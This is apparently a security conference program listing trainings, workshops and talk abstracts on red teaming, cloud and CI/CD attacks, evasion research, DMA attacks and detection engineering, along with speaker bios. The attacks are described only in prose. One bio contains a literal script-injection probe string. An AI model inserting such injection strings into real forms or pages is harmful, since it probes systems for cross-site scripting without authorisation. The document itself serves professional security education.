The purpose of the Red Team Training is to understand the underlying concept of red teaming. The training will cover payloads generation, lateral movement techniques, initial foothold and internal reconnaissance. The training is aiming to provide a deep understanding of all the previously described aspects of a red team. Click here for Training Syllabus
Charles F. Hamilton (Mr.Un1k0d3r) , CYPFER
Charles Hamilton is a Red Teamer with over ten years of experience delivering offensive testing services for various government clients and commercial sectors. In recent years, Charles has specialized in covert Red Team operations targeting complex and highly secured environments. These operations have enabled him to refine his skills in stealthily navigating client networks without detection.
Since 2014, he has been the founder and operator of the RingZer0 Team website, a platform dedicated to teaching hacking fundamentals. The RingZer0 community currently boasts over 50,000 members worldwide. Charles is also a prolific toolsmith and trainer who has delivered this training more than 20 times, both online and onsite. He is a speaker in the InfoSec industry, known under the handle Mr.Un1k0d3r.
Dive deep into cutting edge techniques that bypass or neuter modern endpoint defenses. Learn how these solutions work to mitigate their utility and hide deep within code on the endpoint. The days of downloading that binary from the internet and pointing it at a remote machine are over. Today’s defenses oftentimes call for multiple bypasses within a single piece of code. Click here for Training Syllabus
As cloud innovation gives birth to new technologies and new threats, now is the time to modernize your cloud security skills and bring them up to the industry standard. Join this hands-on, 4-day course to push your cloud hacking and vulnerability remediation skills to the next level and widen your career prospects. Get your hands dirty with our popular virtual labs and learn from experienced, practicing penetration testers with a legacy of training at Black Hat. Click here for Training Syllabus
Do you feel pretty good about your Web Application Security testing methodology, but think you might be able to get more out of your tools? Years of experience providing instruction on the process of conducting Web Application Security assessments has made it clear. Even the most experienced testers lack a complete understanding of everything that is available in the industry's #1 Web Application Security testing tool: PortSwigger's Burp Suite Pro. It's time to fix that with Practical Burp Advanced Tactics (PBAT). Click here for Training Syllabus
Workshops are first-come, first-serve and have limited capacity. Some workshops may be streamed for additional passive participation.
Type: Intermediate–Advanced Focus: Adversary emulation, detection engineering, IR workflows Style: Fast, offensive-defensive, “learn by attacking and defending”
Cloud platforms like Amazon Web Services (AWS) are foundational to many critical infrastructures and enterprise applications, making them prime targets for attackers. In this session, we will not only explore the most relevant attack vectors cybercriminals use to compromise AWS infrastructures but will also simulate these attacks using known threat actor techniques in an adversary emulation context. From initial access to hardcore persistence, this talk will provide a comprehensive look at how attackers operate in AWS environments.
We will take a technical journey through the tactics, techniques, and procedures (TTPs) employed by attackers at every stage of the threat lifecycle, aligned with the MITRE ATT&CK framework. We’ll start by reviewing common methods of initial access, such as exploiting exposed credentials or vulnerabilities in services like IAM, Lambda, and EC2. From there, we’ll detail how attackers escalate privileges, move laterally, and evade detection from tools like CloudTrail.
The session will conclude with an in-depth look at advanced persistence techniques in AWS, including the manipulation of IAM policies, backdooring Lambda functions or Docker containers, and tampering with logs. Along the way, we’ll demonstrate how security teams can implement defensive and detection strategies to mitigate these risks. By leveraging AWS-native services and third-party tools, attendees will learn how to enhance their incident response capabilities.
This hands-on workshop will give attendees practical, technical insights into AWS security, adversary behavior, and how to better defend against sophisticated, persistent attacks. A full hands-on experience, this presentation ensures deep technical immersion.
Requirements: Participants should have the following ready before the training: AWS CLI installed Terraform installed GitHub account for cloning lab repos Knowledge of AWS Security Fundamentals
An email with detailed setup instructions will be sent beforehand. Provided Material: Github Repository with the solution to the workshops
Final Notes This training is designed for security engineers, SOC analysts, incident responders, and anyone who wants to truly understand AWS security through hands-on work. By the end of the session, you’ll have a deep understanding on how real attack and defense techniques work in AWS, being able to understand the hardening requirements, replicate attacks, generate detection use cases, and execute forensic techniques.
Santiago Abastante CTO, Solidariy Labs
Former Police Officer from Argentina, now a Cloud Incident Responder and Security Engineer with over 10 years of IT experience. A Digital Nomad and international speaker, I've presented on Cloud Security and Incident Response at Ekoparty, FIRST, Virus Bulletin (three times), Hack.Lu, and various BSides events worldwide. I hold a Bachelor's degree in Information Security and an MBA (Master in Business Administration).
Workshops are first-come, first-serve and have limited capacity. Some workshops may be streamed for additional passive participation.
AI agents represent a fundamental shift for security practitioners. They can automate tedious workflows, act as a co-pilot while you build custom tooling that was previously out of reach, and - when integrated into a well-designed system - serve as an intelligent analyst alongside you.
This workshop shows you all three. You'll learn to direct AI agents effectively, then apply those skills to customize and use a complete threat hunting system that combines deterministic processing with AI-assisted analysis.
What You'll Build A working threat hunting pipeline:
The deterministic layer does the heavy lifting. The agent provides contextual analysis on what surfaces. You make the final call.
What You'll Learn Beyond the system itself, you'll learn the practices that make agent collaboration effective: - Structuring projects so agents understand your environment, optimize outputs, and retain "memory" - Integrating systems that ensure you not only become effective at delivering results, but ensure you continue learning while working with agents ("anti-brainrot systems") - Context management + intuition - learn how to optimize your interaction with agents - Learn how to extend agent capabilities, when MCPs are the right call, when they are not - Agentic coding best practices - staying on top of what's being built, not outsourcing your thinking - Building reusable skills for repeatable security workflows - Hooks and guardrails for safe, automated agent operation
Who Should Attend Threat hunters, detection engineers, SOC analysts, and security practitioners who want to integrate AI agents into their workflow - whether for building tools, automating analysis, or hunting threats.
Requirements - Laptop with terminal access - Model access - I will be using Claude Code, but the course is agnostic - you can use any model to provide inference.
Faan Rossouw Researcher/Instructor, Active Countermeasures + AntiSyphon Training
Faan Rossouw is a security researcher at Active Countermeasures and instructs at Antisyphon Training, where he teaches courses on threat hunting and offensive security tooling. He's currently building AionSec.ai - courses designed to help security practitioners leverage AI agents in their work. Originally from South Africa, Faan is now based in Val-David, Quebec.
Talks will be streamed on YouTube and Twitch for free.
Red teaming and penetration testing are core practices of the cyber security audit landscape. Both of these practices rely on the ability to execute offensive software tools that are normally detected as malicious by antivirus software. To achieve the execution of these tools on systems where antivirus software are installed, operators rely on several techniques to evade detection. In practice, detection evasion is, too often, ill-informed guesswork. A better methodology for evasion would allow for more efficient, and therefore more affordable campaigns thus contributing to more cyberresilient organisations.
This presentation will discuss some of my ongoing Ph.D. research into methodologies for deducing information about detection capabilities present in antivirus software solutions. I propose a black-box approach based on software probes, mutations and the logical implications of their detection to identify antivirus capabilities. Correct identification of these capabilities would allow evasion techniques to be applied intently and minimally, reducing chances of unexpected detections and decreasing time spent on evading antivirus software.
Talks will be streamed on YouTube and Twitch for free.
This talk covers a big Security Operation Center (SOC)’s journey through maturing our detection engineering practice by implementing detection as code (DaC) principles.
What we will cover: 1. Our starting point (where a lot of SOCs are): no DaC, manually modifying rules in a SIEM; 2. What is DaC and why it’s a game-changer for detection engineers; 3. Why we chose Sigma as the backbone of our DaC practice; 4. Our gradual transition to DaC 5. A real case study of how Sigma + DaC made changing SIEM so much easier.
Intended audience: people who create or manage detection rules in a SOC, people who want to increase the quality and stability of the rules you maintain and people who are interested in how DevOps principles can be applied to security operations.
Émilio works at a large Canadian organization doing software development, detection engineering and incident response. He's a co-organizer of MontréHack (a monthly cybersecurity workshop) and NorthSec's VP CTF.
Outside the cybersecurity world, he's passionate about urbanism and the economics of housing. He will gladly explain how exclusionary zoning and parking mandates are the reasons you can't buy a home to anyone who dare ask.
Talks will be streamed on YouTube and Twitch for free.
Security Operation Centers (SOCs) are used by companies to defend themselves against cyber-attacks. These SOCs monitor logs collected from the enterprise network such as process activity, authentication events and netflow, to identify attacks or compromises. These security teams must navigate numerous alerts generated from a wide range of security controls using both rules and Machine Learning (ML) to identify malicious activity. This is even more so the case in large-scale SOCs, or for companies offering Managed Detection and Response (MDR).
This talk showcases a multi-step approach used in a modern large-scale managed SOC that manages thousands of enterprise networks, demonstrating how it can successfully identify a real infostealer attack through multiple layers of filtering and processing. Through a two-week period containing 9.7 trillion event logs, the presented approach combines alert deduplication, individual rule-based and ML based detectors, alert suppression, and a supervised ML based alert prioritization model to dramatically reduce the noise, so that security analysts can pinpoint the infostealer activity.
François Labrèche Principal Data Scientist, Sophos
François Labrèche is a Principal Data Scientist at Sophos, who focuses on applying machine learning approaches to research problems related to security alerts and vulnerabilities. He focuses on using machine learning to improve the prioritization of alerts and vulnerabilities, in the context of XDR and vulnerability management. He has a Ph.D. from École Polytechnique de Montréal, and has published research papers on the topics of threat research, spam detection, malware analysis and machine learning applied to cybersecurity. He has presented at ACSAC, CAMLIS, NorthSec, BSides Montreal, University College London and École Polytechnique de Montréal, and has published papers in conferences such as the ACM CCS and eCrime.
Talks will be streamed on YouTube and Twitch for free.
Windows shortcut (.LNK) files have remained a popular attack vector over several decades, yet their underlying format is still largely archaic and remains the "gift that keeps on giving" by presenting new opportunities for abuse, even in 2026.
If you believe minor bypasses like adding spaces to an LNK's target (CVE-2025-9491) are the limit of LNK exploitation, this session will change your mind.
We will show previously undocumented LNK techniques that actually allow for more deceptive payload delivery/command execution. We will look at why these new techniques 'work', compare them to existing LNK tricks, and discuss the implications for defenders.
The research methodology behind these new findings, which involved black-box testing of Microsoft's LNK implementation, will be discussed during this session; demonstrating how adopting the "hacker's mindset" helped uncover these LNK tricks.
Next to this, this session will introduce an open-source tool designed to assist security professionals, red teams, and researchers in generating and experimenting with advanced LNK payloads. This tool aims to enhance the ability to simulate and defend against shortcut-based attacks, thereby improving Windows endpoint security.
Wietze has been hacking around with computers for years. Originally from the Netherlands, he currently works as a Lead Threat Detection & Response Engineer in London. As a cyber security enthusiast and threat researcher, he has presented his findings on topics including attacker emulation, PowerShell obfuscation, DLL Hijacking and command-line shenanigans at a variety of security conferences. By sharing his research, publishing related tools and his involvement in the open-source projects such as LOLBAS, HijackLibs and ArgFuscator, he aims to give back to the community he learnt so much from.
Talks will be streamed on YouTube and Twitch for free.
Internet shutdowns are often described as a single action — “turning the Internet off.” In practice, they are the result of carefully orchestrated, multi-layered technical controls applied across national infrastructure. Building on my previous talk at BSides, which introduced the fundamental mechanisms of Internet censorship and shutdowns, this session presents a deeper and more comprehensive technical analysis of the 2026 Internet blackout in Iran.
This talk treats large-scale censorship not as a political phenomenon, but as a network engineering and security operation. We examine who has the technical authority to execute shutdowns, how different censorship techniques are layered and coordinated, and when specific tactics are selectively deployed to maximize impact while maintaining internal network functionality.
The analysis spans multiple layers of the stack. At the routing level, we examine BGP route withdrawals, path manipulation, and international transit isolation. At the access and transport layers, we analyze ISP-level service suppression, mobile network data blackouts, and traffic throttling. At the protocol and application layers, we explore deep packet inspection (DPI), protocol fingerprinting, encrypted traffic degradation, and selective blocking of VPNs, QUIC, and TLS-based services.
Special attention is given to the role of national intranet architectures, which allow domestic services to remain reachable while international connectivity collapses, creating the illusion of partial availability. The session also addresses the technical limits of alternative access methods, including satellite Internet, and why such technologies are not a universal solution under state-scale controls.
Using timelines, traffic behavior, and protocol-level indicators, the talk demonstrates that modern Internet shutdowns are graduated, adaptive, and measurable rather than binary events. Attendees will learn how these techniques manifest on the wire, how they can be detected from inside and outside the affected region, and why many common circumvention strategies fail under coordinated, nation-state enforcement.
This presentation is intended for security professionals, network engineers, and researchers interested in Internet resilience, censorship measurement, and large-scale network interference, offering a technically grounded continuation of prior research and real-world observations.
Reza Sharifi Executive Consultant - Cybersecurity Specialist, CGI Deutschland
I’m a cybersecurity professional with a background in network security and internet infrastructure research. My focus is on the intersection of technology and civil liberties, particularly how network-layer protocols are used—and misused—by state actors to control access to information.
Talks will be streamed on YouTube and Twitch for free.
GitHub gives attackers something they love: a place where identity, automation, and production changes meet. Once they’re in, the path from “read access” to “shipping malicious code” can be disturbingly short.
In this talk, we walk through realistic attack paths into GitHub organizations, starting with initial access techniques like device-code phishing and the abuse of trusted GitHub Apps (including the GitHub CLI). From there, we explore how different credential types enable access long-lived Personal Access Tokens that often persist on developer machines, and short-lived automation credentials like GITHUB_TOKEN that can still leak through logs, artifacts, or misconfigured workflows and then be leveraged to move laterally or expand privileges.
We highlight tactics we’ve developed and researched post-initial access: how you can abuse sensitive workflows, exploit approval and review dynamics, and find paths around policy guardrails like “protected” pipelines and code-signing rulesets. We’ll also discuss tradeoffs attackers make to reduce forensic visibility and delay detection in environments where GitHub’s native telemetry is limited.
We close with practical defender takeaways: detection strategies and response playbooks focused on the signals that matter and how to improve monitoring coverage in the places GitHub is hardest to observe.
Attendees will leave with a shared framework that’s useful on both sides of the table. Defenders will get a checklist for reducing risk across identities, tokens, integrations, and Actions workflows plus concrete ideas for building higher-signal detection and response in places where visibility is lacking. Red teams will gain a realistic map of where GitHub controls tend to break down in practice, along with a set of hypotheses to test during assessments that go beyond “find a secret in a repo.” The goal is to walk out with sharper intuition for how small weaknesses chain into meaningful impact, and practical ways to either validate that risk (red teams) or eliminate it (blue teams) without grinding delivery to a halt.
Andrew Buchanan Senior Red Team Operator, Figment
Andrew is a Senior Red Team Operator at Figment, the world’s leading independent staking infrastructure provider. With over six years of Red Team experience, Andrew brings deep expertise across offensive security, adversary simulation, and real-world attack execution.
Prior to joining Figment, Andrew held cybersecurity roles at one of Canada’s largest financial institutions, conducting advanced red team engagements and security assessments across highly complex enterprise environments.
At Figment, Andrew plans and executes red team operations, penetration tests, and targeted security assessments with a focus on initial access, execution, cloud attack surfaces, and social engineering. As an initial access and social engineering specialist, he has designed and delivered numerous successful campaigns that closely mirror real-world threat actors. Andrew’s work helps ensure Figment continuously tests and strengthens its defences ensuring that Figment's institutional customers can trust they're using the most secure staking product on the market.
Max CM Security Architect and Red Team Lead, Figment
Max Courchesne-Mackie is a cyber security professional with over a decade of experience spanning defense, red teaming, and blockchain security. Max currently serves are a Security Architect at Figment, the leading independent staking infrastructure provider globally. He began his career in the defense industry focused on offensive security, a discipline that remains his core passion and informs his pragmatic approach to risk. Today, Max designs and reviews secure systems for the blockchain industry - an environment facing relentless, rapidly evolving threats. He partners with engineering and product teams to harden architectures, pressure-test assumptions, and translate attacker tradecraft into practical controls. Max's recent work centers on threat modeling for decentralized systems, secure key and wallet management, and building detection/response mechanisms that assume breach.
Connor Laidlaw Senior Application Security Engineer, Figment
Connor is a Senior Application Security Engineer at Figment, the world's leading independent staking infrastructure provider. His career spans a diverse range of security domains, including low-level vulnerability research, offensive security for ticket scalping operations, and engineering defenses to protect applications from abuse.
At Figment, Connor serves as the security subject matter expert for all customer-facing applications. He proactively identifies security concerns at every stage of the software development lifecycle and partners with engineering teams to architect robust solutions. Connor is also spearheading an initiative to integrate AI into Figment's security program, including the development of highly specialized offensive security agents powered by deep contextual awareness of Figment's environment—ensuring that Figment's institutional customers can trust they're using the most secure staking product on the market.
Talks will be streamed on YouTube and Twitch for free.
Security researchers push the boundaries of what’s possible. (Nation-state) threat actors push the boundaries of what’s exploitable. In many cases, threat actors adopt public research for their operations, but there are also many examples where threat actors use novel techniques to compromise cloud environments before researchers publish their findings.
In this talk, a cloud security researcher and a threat intelligence analyst team up to explore how cutting-edge cloud attack research is rapidly weaponized by espionage threat groups. We’ll walk through real-world examples where newly published techniques – intended to educate defenders – were adopted and operationalized by nation-state actors targeting cloud environments. The focus of the talk will be on Entra ID and Microsoft 365 attacks, exploring both the technical mechanics behind the tools and techniques, why threat actors are interested in utilizing them and real-world example of research adoption. Examples of techniques cover include device code phishing, authorization code phishing (ConsentFix) and the adoption of open source security tools.
This session highlights how attack paths that may seem highly theoretical at first glance can pose a significant and immediate threat to organizations operating in the cloud. What starts as a proof-of-concept in a blog can quickly become a part of a threat actor’s playbook.
Dirk-jan Mollema Security Researcher, Outsider Security
Dirk-jan Mollema is a security researcher focusing on Active Directory and Microsoft Entra (Azure AD) security. In 2022 he started his own company, Outsider Security, where he performs penetration tests and reviews of enterprise networks and cloud environments. He blogs at dirkjanm.io, where he publishes his research, and shares updates on the many open source security tools he has written over the years. He presented previously at TROOPERS, DEF CON, Black Hat and BlueHat, is a current Microsoft MVP and has been awarded as one of Microsoft’s Most Valuable Researchers multiple times.
Talks will be streamed on YouTube and Twitch for free.
In March of 2025, the Model Evaluation & Threat Research (METR) group introduced AI task time horizons as a method for measuring the length of tasks that models can autonomously complete coherently. They demonstrated rapid growth in capabilities across frontier systems: effectively showing a doubling every \~7 months. While this framework has primarily been applied to general software and knowledge work, its implications for adversarial domains remain largely unexplored.
In this talk, I present work I've done with Sean Peters and Jack Payne, extending METR’s methodology to offensive cybersecurity workflows, alongside a complementary human baseline study to ground and interpret model performance.
Motivated by the desire to better understand offensive model capabilities, we assembled realistic multi-step offensive task sequences by leveraging a suite of industry standard benchmarks. Both human participants and frontier models were evaluated across increasing task lengths to quantify sustained autonomy, coherence, and failure modes.
Initial results indicate that AI task horizons in offensive cyber are already meaningful and extending rapidly. In several domains, models can chain complex tool-driven actions resembling early-stage intrusion playbooks rather than isolated exploitation steps. The human study provides critical context, highlighting where models approach or diverge from human performance as task length increases.
The talk will cover the experimental design, empirical findings, and key limitations, emphasizing how horizon-based evaluation combined with human grounding surfaces trends that may not be observable by standalone, static benchmarks.
Finally, this work is positioned as exploratory research. It raises questions about whether similar horizon trends appear in defensive workflows: how could we measure defensive task horizons, and what methods would allow meaningful comparisons to offensive performance? If the trend does not replicate in defense, what interventions, tooling, or policy changes could help close the gap? This framing invites further investigation and provides a roadmap for research and practitioner engagement in understanding and mitigating offense–defense asymmetries under AI automation.
Jeremy Miller Sr. Manager, Cybersecurity Strategy.& Research, OffSec
Jeremy Miller is an offensive security leader and educator, currently focused on how AI automation is reshaping adversarial capability. He spent over a decade at Offensive Security in technical and leadership roles across content development, training, and workforce development programs, bridging hands-on offensive methodology with pedagogy and strategy.
His current research, in collaboration with Sean Peters and Jack Payne, applies the METR AI task time horizon framework to realistic offensive cyber workflows, grounded by complementary human studies to measure autonomy scaling in adversarial domains.
Jeremy’s interests center on offense–defense asymmetry, empirical evaluation of autonomous systems, and translating AI security and safety research into practical implications for decision makers.
Talks will be streamed on YouTube and Twitch for free.
Abstract: Traditional defensive measures alone are proving insufficient against determined adversaries. This talk introduces a systematic approach to implementing effective deception solutions by using BloodHound's OpenGraph framework to map and deploy deceptive attack paths across AD and third-party enterprise technologies.
This talk moves beyond basic honeypots and canary tokens. This presentation demonstrates how to build discoverable deceptions that actually entice attackers. We'll explore how understanding existing attack paths in your environment is crucial to creating believable deceptions that adversaries will naturally encounter and attempt to exploit.
Key Topics Covered: - Attack Path-Driven Deception Design: Using attack path analysis to identify optimal deception placement points and create realistic adversary scenarios - OpenGraph for Deception Mapping: Extending beyond Active Directory to model deceptive attack paths across Git repositories, configuration management systems, and cloud services - Practical Implementation Examples: Live demonstrations including AD CS deception using Certiception, repo-based deceptions with GitHound, infrastructure deceptions through AnsibleHound and SCCMHound
Joshua Prager Managing Consultant, SpecterOps Inc.
Josh Prager has over 13 years’ experience focusing on DoD red team infrastructure, cyber threat emulation and threat hunting. As a former threat hunter in the Federal industry, he provided various cyber threat emulation and threat hunting assessments throughout DOD environments. As a principal consultant at SpecterOps, he guides clients in developing the maturity of their detection and response programs, building their detection engineering capabilities, and ensuring detective and preventive coverage of offensive techniques.
Talks will be streamed on YouTube and Twitch for free.
We can't trust the images and videos we see online anymore. Recent generative AI improvements support the creation and modification of convincing digital media in quasi real time. We live in an era where these fakes are routinely shared online to influence public opinion, even by elected officials themselves!
Fortunately, technologies exist to embed cryptographic signatures and watermarks in these digital assets, proving their origin. The C2PA specification is being adopted by many technology providers, camera manufacturers, and news media organizations. Major deployments have started in 2025 and will accelerate in 2026.
In high-risk contexts (conflict zones, protests, corruption reporting) creators might be reluctant to share certified images and videos for fear of retribution. Is there a way to reconcile the need for authenticated assets and the privacy of their creators? The answer is yes!
In this talk, we'll explore cryptographic options to provide privacy to those who capture and share digital assets, enabling anonymous yet verifiable content. We'll present an open-source prototype that augments the C2PA specification by using blind signatures and zero-knowledge proofs to hide the signer's identity. These technologies offer the best of both worlds: enabling the public, reporters, and whistleblowers to share sensitive authentic digital media with strong privacy protections, which would increase trust in our content ecosystems.
Christian Paquin Principal Research Software Engineer, Microsoft Research
Christian is a security specialist in the Microsoft Research Cryptography team with a mission to bridge the gap between academic research and real-world systems. With 25 years of experience, Christian has been involved in many industry-wide initiatives such as the development of privacy enhancing identity technologies (such as anonymous credentials), the ongoing post-quantum cryptographic migration, and the Coalition for Content Provenance and Authenticity (C2PA) to fight online disinformation. Christian shares some of his work results on his blog.
Talks will be streamed on YouTube and Twitch for free.
When you think of hacking browsers, you perhaps think of V8 heap exploitation, deep-dive fuzzing, crazy sandbox escapes, and so on. But what if I told you that you can still find vulnerabilities in major browsers that don’t require any technical knowledge? Bugs you can even run into by accident!
In this talk, I’ll take you through my journey of how I “accidentally“ found a vulnerability in Google Chrome. And how that led me to find 2 more vulnerabilities in Chrome as well as 2 vulnerabilities in Mozilla Firefox and many more bugs in other products.
So if you’re keen to find out how I could, with minimal user-interaction, steal your private GitHub repositories, then this talk is for you!
Robbe Van Roey Offensive Security Lead, Toreon
Hi! I’m Robbe Van Roey 👋
I’m a hacker. I like breaking stuff. I’m a penetration tester at Toreon, I’ve worked for a bug bounty company, and I’ve found 35+ CVEs. I love hacking web apps, mobile applications, AI systems, and Active Directory. I’m also a teacher. I teach developers about secure coding, I teach beginners about Red Teaming for Hack The Box and I’ve created a bunch of YouTube videos on my channel.
In the online realm, you may know me as PinkDraconian. Come up to me and say hi!
My life motto is “Hacking you so you don’t get hacked“ and I’d like to show you part of that ideology during my talk. See you there!
Talks will be streamed on YouTube and Twitch for free.
Have you ever wondered how to run code inside a different process? Or, for that matter, why you would WANT to run code in another process?
I originally entered the security world writing cheats for Windows games - Starcraft, Warcraft II, and similar late-90s games. The tools are functionally lost to the ages, but the techniques I used have served me for years: not only can you use process injection to cheat at video games, it's useful for so much more: adding, changing, bypassing, or even calling code in a foreign process can help with fuzzing, reverse engineering, malware detection, and so much more!
But for a technique so commonly used, there isn't really a "standard" way to do it, especially on Linux!
One day, I read a blog discussing how hard it was to do on Linux. I thought, "that can't be right, it's easy on Windows!" and set out to prove them wrong. Days later, I had accidentally written a debugger and learned way, way too much about the ptrace API and /proc filesystem!
In this talk, I'll demonstrate the tooling I built and why it might be more useful than you might think to do this yourself!
Ron Bowes Principal Security Researcher, GreyNoise Intelligence
Ron Bowes is a Principal Security Researcher on the GreyNoise Labs team, which tracks and investigates unusual--typically malicious--internet traffic. His primary role is to understand and track the big vulnerabilities of the day/week/month/year; often, that means parsing vague vendor advisories, diff'ing patches, reconstructing attacks from log files, and--most complex of all--installing and configuring enterprise software. When he's not at work, he runs the BSides San Francisco Capture the Flag contest, is a founder of The Long Con conference in Winnipeg, takes improv classes, and continues his project to finish every game in his Steam library.
Talks will be streamed on YouTube and Twitch for free.
En 1865, Jules Verne envoie des hommes sur la Lune depuis la Floride. En 1969, Apollo 11 décolle de Cap Canaveral. En 1984, William Gibson décrit le cyberespace comme une "hallucination consensuelle". Quarante ans plus tard, nous y vivons. La science-fiction n'est pas une prédiction — c'est un laboratoire d'idées où le futur se prototype avant d'exister.
Cette conférence propose un voyage entre imaginaire et innovation, entre les pages des romans d'hier et les laboratoires d'aujourd'hui.
Dans un premier temps, nous revisiterons quelques anticipations célèbres : les tablettes tactiles de Star Trek, les oreillettes de Fahrenheit 451, la vidéosurveillance de 1984, les voitures autonomes de Total Recall.
Puis nous plongerons dans des innovations moins médiatisées mais plus disruptives. Que pouvons-nous puiser dans la Science-Fiction pour deviner ce que notre futur proche nous réserve avec les découvertes actuelles : IA générative, calcul quantique.
Enfin, nous explorerons un territoire encore plus radical : l'informatique biomoléculaire. Des chercheurs travaillent aujourd'hui sur des systèmes de calcul qui se nourrissent de sucre et de lumière. Stockage de données dans des molécules, calcul biologique, interfaces vivantes — nous sommes à l'aube d'une révolution dont peu de gens mesurent l'ampleur. Là encore, que nous raconte les grandes imaginations sur ces sujets en devenir ?
Pour conclure, nous combinerons ces briques pour imaginer des scénarios possibles. Certains existent déjà dans la littérature de science-fiction. D'autres restent à écrire. Vous repartirez j'espère avec l'envie d'identifier les futurs souhaitables et ceux que nous voulons éviter.
Car penser le futur n'est pas un luxe intellectuel. C'est une responsabilité. En tant que technologues, chercheurs, hackers, citoyens, nous avons le pouvoir d'orienter la trajectoire. La science-fiction d'hier est la science d'aujourd'hui. La science-fiction d'aujourd'hui sera le monde de nos enfants.
Le futur ne se prédit pas. Il se choisit.
Xavier Facélina Executive Vice President, SECLAB
Xavier Facélina est co-fondateur de SECLAB, entreprise française spécialisée dans la cybersécurité des infrastructures critiques. Autodidacte, il a quitté l'école avant le bac pour se former seul à l'informatique et n'a jamais cessé depuis. En 20 ans, il a accompagné des opérateurs d'importance vitale dans les secteurs de l'énergie, de la défense et de l'industrie. Il possède encore un Minitel en état de marche. Il préfère les questions aux réponses et croit que la meilleure façon de prédire le futur, c'est de l'inventer.
Talks will be streamed on YouTube and Twitch for free.
This presentation will focus on AnsibleHound, a collector that adds Ansible WorX and Ansible Tower attack paths to BloodHound. Additionally, we will conduct a thorough exploration of Ansible exploitation and abuse through attack path management. This will enable both attackers and defenders to identify hybrid attack paths.
Our presentation will provide you with three key takeaways:
Charl-alexandre Le Brun Senior Penetration Tester, Desjardins
Charl-Alexandre is a dedicated member of the information security community. With several years of experience as a penetration tester, he is driven by a strong passion for developing innovative tools and techniques that advance the field and contribute to the broader community.
Simon Lachkar Offensive Team Lead, Desjardins Group
Simon leads the full-scope penetration testing team at Desjardins Group, one of Canada's largest financial institutions. Previously, he worked as a technical team leader and penetration tester in Canada and France. Simon has recently been involved in developing the AnsibleHound project.
Talks will be streamed on YouTube and Twitch for free.
For years, we wrote the defensive manuals. We built the "Living Off The Pipeline" (LOTP) inventory and released poutine to help you find the vulns. We even spoke at NorthSec about the theoretical risks of Build Pipeline compromise.
We have bad news: The Threat Actors were "in the room" taking notes.
In early 2025, we found the "smoking gun." A Threat Actor on BreachForums laid out the full attack plan for a 0-day compromise of a major Open Source project, giving a direct shout-out to our poutine scanner and LOTP research as the source. Our defensive work has become their offensive playbook.
In this talk, we stop playing defense.
Introducing SmokedMeat: The "Metasploit for CI/CD."
Our research team has a saying: 2025's Build Pipelines look like the average 2005 PHP Web App in terms of secure coding. They are wide open to "pwn requests" and command injections that lead to secrets exfiltration or privilege escalation via overprivileged tokens. SmokedMeat is the first Open Source Red Team framework designed to commoditize these compromises, demonstrating exactly what happens when a Threat Actor turns your infrastructure against you.
We will demonstrate a full exploitation chain: pivoting from unprivileged anonymous access on public repositories to private repository and intellectual property theft, the "gone in 60 seconds" jump from a workflow runner directly to permanent Cloud Admin, and the ability to escape ephemeral job contexts to implant permanent backdoors on your build infrastructure.
The era of "awareness" is over. This talk is a live demonstration of why your current CI/CD security strategy is already obsolete.
Talks will be streamed on YouTube and Twitch for free.
This talk will expand on concepts explored in my NSEC 2025 talk "Stolen Laptops : A brief overview of modern physical access attacks"
We will deep-dive into the subject of Direct Memory Access attacks against modern windows operating systems, exploring together some of the primary countermeasures employed to protect computers from physical attackers.
Notably, we will discuss the implementation and interaction of various defensive technology at the physical, firmware, and operating system layers.
This includes things like UEFI security, hardware whitelisting, firmware DMA protection and virtualization features (VT-d, VT-x, AMD-Vi), and their interaction with critical OS layer protection mechanisms including Virtualization-Based Security (VBS) and Kernel DMA Protection. We will discuss techniques used by attackers to neutralize or bypass these mechanisms to enable a DMA attack against Windows 11.
The talk culminates with an in-depth presentation of a novel tool I developed called DMAReaper. The tool allows attackers with physical access to Disable Kernel DMA Protection via a pre-boot DMA attack even when a system has all modern protection mechanisms enforced.
We will discuss the research that supported the tool's creation and the precise operations being performed against system RAM in order to locate and destroy the DMAR ACPI table required for Kernel DMA Protection to function. This talk includes a multiple video demonstrations of the tool being used to compromise a modern workstation running Windows 11.
Pierre-Nicolas Allard-Coutu Senior Penetration Tester, Bell Canada
Pierre-Nicolas Allard-Coutu is a senior penetration tester and offensive security R&D lead at Bell Canada's Security Testing and Incident Response team (STIRT). He is a seasoned red team operator with many years of experience specialized in the development of malware payloads and payload delivery systems. More recently, he has spearheaded the creation of physical penetration test methodologies including novel exploitation techniques aimed at compromising UEFI pre-boot environments and enabling Direct Memory Access vectors against modern laptops. He is currently the top public contributor to the Quebec Government Cyber Defense Center's vulnerability disclosure program, and part of the HackFest Challenge design team. The type of person who could never resist placing "><script>alert(1);<!-- in his bio.
Talks will be streamed on YouTube and Twitch for free.
5G networks are being opened up at every layer and attackers are paying attention. On the radio interface, we assess what operators actually deploy: is encryption enabled? Is integrity protection enforced on signaling and user plane? Are null ciphers still accepted? How well is the network isolated from external access? These fundamentals still fail more often than you'd think.
The 5G core runs on cloud-native REST-based architectures where a single misconfigured network function can expose subscriber data or provide persistence into critical infrastructure. We demonstrate this live using our open-source 5GC API Pentest Burp Suite extension automating NF discovery, IMSI enumeration, credential extraction, and API fuzzing against a 5G core. OpenRAN disaggregates the radio access network into open interfaces between O-RU, O-DU, O-CU, and the RIC - creating attack surfaces that didn't exist in monolithic base stations. And now CAMARA, the industry initiative exposing network capabilities through standardized APIs, gives third parties access to device location, SIM swap, and number verification, with security models still maturing.
This talk walks through real assessments and attacks at each layer from verifying radio protections to exploiting core APIs and examining how some endpoints could enable surveillance and fraud.
Sébastien Dudek is the founder of Penthertz, a French company specializing in wireless and hardware security. With over 15 years of experience in telecommunications security, he has published research on 5G security, Open RAN, baseband fuzzing, mobile network interception, and power-line communication vulnerabilities. He is the creator of RF Swift, an open-source SDR toolkit, V2G Injector/HomeplugPWN, 5GC API Pentest, and LoRa Craft among other security tools.
His clients major defense and (aero)space companies, include automotive, and his work spans from 2G through 5G security, OT/IoT device security, and critical infrastructure protection.